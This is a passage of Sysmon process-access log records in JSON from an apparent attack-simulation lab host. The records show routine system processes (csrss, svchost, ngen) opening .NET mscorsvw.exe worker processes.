C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.230","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010C8B00D00}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6866,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.246\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010C8B00D00}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.246","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010C8B00D00}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6867,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.293\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010ECB40D00}\r\nTargetProcessId: 4844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.293","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010ECB40D00}","TargetProcessId":"4844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6868,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.293\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010ECB40D00}\r\nTargetProcessId: 4844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.293","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010ECB40D00}","TargetProcessId":"4844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6869,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010ECB40D00}\r\nTargetProcessId: 4844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010ECB40D00}","TargetProcessId":"4844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6870,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.339\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-044A-5F25-0000-001009460C00}\r\nTargetProcessId: 3236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.339","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-044A-5F25-0000-001009460C00}","TargetProcessId":"3236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6871,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.339\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-044A-5F25-0000-001009460C00}\r\nTargetProcessId: 3236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.339","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-044A-5F25-0000-001009460C00}","TargetProcessId":"3236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6872,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001027B90D00}\r\nTargetProcessId: 3236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001027B90D00}","TargetProcessId":"3236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6873,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.386\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010A5BC0D00}\r\nTargetProcessId: 488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 